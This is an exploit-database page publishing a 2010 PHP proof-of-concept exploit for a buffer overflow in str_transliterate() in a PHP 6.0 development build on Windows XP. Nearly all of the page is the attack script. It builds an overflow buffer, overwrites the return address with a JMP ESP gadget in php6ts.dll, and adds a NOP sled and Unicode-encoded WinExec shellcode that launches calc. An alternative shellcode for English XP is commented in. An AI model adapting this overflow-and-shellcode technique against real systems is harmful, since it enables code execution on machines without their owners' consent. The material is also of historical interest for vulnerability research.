PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
# Published : 2010-04-04
# Author : Pr0T3cT10n
# Previous Title : Internal Information Disclosure in McAfee Email Gateway (formerly IronMail)
# Next Title : ZipCentral (.zip) SEH Exploit

<?php
error_reporting(0);
#####################################################################
## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
## Buffer Overflow
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## Exploited by TheLeader, Debug
## SP. Thanks: HDM
## http://www.nullbyte.org.il
#####################################################################
## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
## Take a look, 'unicode.semantics' has to be on!
## php.ini > unicode.semantics = on
#####################################################################
if(ini_get_bool('unicode.semantics')) {
 $buff = str_repeat("u4141", 256);
 $eip = "u1445u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
 $nops = str_repeat("u9090", 20);

 # WinExec Calc XP SP3 HEB Unicode-encoded shellcode
 $shellcode = "u02EBu05EBuF9E8uFFFFu33FFu5BC0u4388u8315u11C3uBB53u250Du7C86uD3FFu6163u636Cu414E";
 
 # WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts)
 # $shellcode = "u02EBu05EBuF9E8uFFFFu33FFu5BC0u4388u8315u11C3uBB53u23ADu7C86uD3FFu6163u636Cu414E";
 
 $exploit = $buff.$eip.$nops.$shellcode;
 str_transliterate(0, $exploit, 0);
} else {
 exit("Error! 'unicode.semantics' has be on!rn");
}

function ini_get_bool($a) {
 $b = ini_get($a);
 switch (strtolower($b)) {
  case 'on':
  case 'yes':
  case 'true':
   return 'assert.active' !== $a;
  case 'stdout':
  case 'stderr':
   return 'display_errors' === $a;
  default:
   return (bool) (int) $b;
 }
}
?>